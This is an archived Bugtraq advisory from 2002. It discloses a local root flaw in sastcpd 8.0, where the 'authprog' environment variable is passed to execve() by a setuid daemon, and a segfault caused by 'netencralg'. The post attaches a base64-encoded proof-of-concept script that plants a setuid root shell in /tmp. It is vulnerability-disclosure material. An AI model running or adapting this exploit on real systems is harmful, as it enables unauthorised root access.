[24038] in bugtraq

home help back first fref pref prev next nref lref last post

sastcpd 8.0 'authprog' local root vulnerability

daemon@ATHENA.MIT.EDU (rpc)
Wed Jan 30 18:06:11 2002

Date: Wed, 30 Jan 2002 22:40:58 -0800
From: rpc <rpc@unholy.net>
To: bugtraq@securityfocus.com
Cc: rpc@unholy.net
Message-Id: <20020130224058.0bf23012.rpc@unholy.net>
Mime-Version: 1.0
Content-Type: multipart/signed; protocol="application/pgp-signature";
 boundary="=.g8ZC'15jPPYm)M"

--=.g8ZC'15jPPYm)M
Content-Type: multipart/mixed;
 boundary="Multipart_Wed__30_Jan_2002_22:40:58_-0800_081ee518"


--Multipart_Wed__30_Jan_2002_22:40:58_-0800_081ee518
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit

Hi,

Several environment variable problems exist in the 'SAS Job Spawner for Open Systems version 8.00'. No other releases of the software were available to test. Sorry.

authprog vulnerability
----------------------

The daemon passes a user-defined environment variable, 'authprog', to execve(). This obviously is a problem if sastcpd is setuid. A sample 'exploit' is attached.

netencralg vulnerability
------------------------

I haven't poked at this long enough to determine whether or not it is exploitable. sastcpd segfaults if 'netencralg' is set to any value.

All test were run on SunOS 5.8.
Both vulnerabilities were discovered with Dave Aitel's/AtStake simple-yet-sexy sharefuzz 1.0.

cheers,
--rpc
--Multipart_Wed__30_Jan_2002_22:40:58_-0800_081ee518
Content-Type: text/x-sh;
 name="authme.sh"
Content-Disposition: attachment;
 filename="authme.sh"
Content-Transfer-Encoding: base64

IyEvYmluL2Jhc2gKIyBzYXN0Y3BkIDguMCAnYXV0aHByb2cnIHZ1bG5lcmFiaWxpdHkuCiMgcnBj
IDxycGNAdW5ob2x5Lm5ldD4gfHwgPGhAY2t6Lm9yZz4KIyBUaGFua3Mgc2hhcmVmdXp6IQoKY2F0
IDw8RU9UID4vdG1wL2hlc2guYwppbnQKbWFpbih2b2lkKQp7CglzZXR1aWQoMCk7CglzZXRnaWQo
MCk7CglleGVjbCgiL2Jpbi9rc2giLCAia3NoIiwgKGNoYXIgKikwKTsKfQpFT1QKCmNhdCA8PEVP
VCA+L3RtcC9oZWguYwppbnQKbWFpbih2b2lkKQp7CglzZXR1aWQoMCk7CglzZXRnaWQoMCk7Cglz
eXN0ZW0oImNob3duIDA6MCAvdG1wL2hlc2giKTsKCXN5c3RlbSgiY2htb2QgNDc1NSAvdG1wL2hl
c2giKTsKCXJldHVybiAwOwp9CkVPVAoKZ2NjIC1vIC90bXAvaGVoIC90bXAvaGVoLmMKZ2NjIC1v
IC90bXAvaGVzaCAvdG1wL2hlc2guYwoKZXhwb3J0IGF1dGhwcm9nPS90bXAvaGVoCi9wYXRoL3Rv
L3Nhcy91dGlsaXRpZXMvYmluL3Nhc3RjcGQKCnNsZWVwIDEKcm0gL3RtcC9oZSouYwpybSAvdG1w
L2hlaAovdG1wL2hlc2gK

--Multipart_Wed__30_Jan_2002_22:40:58_-0800_081ee518--

--=.g8ZC'15jPPYm)M
Content-Type: application/pgp-signature

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)

iD8DBQE8WOcBKfBLFoWw9OURAkWhAJ9VIwND5dVN71rG//BADTcKQX095ACcCoqr
OX5KbLfH2tRi7Plamt/ObFE=
=QSeD
-----END PGP SIGNATURE-----

--=.g8ZC'15jPPYm)M--
home help back first fref pref prev next nref lref last post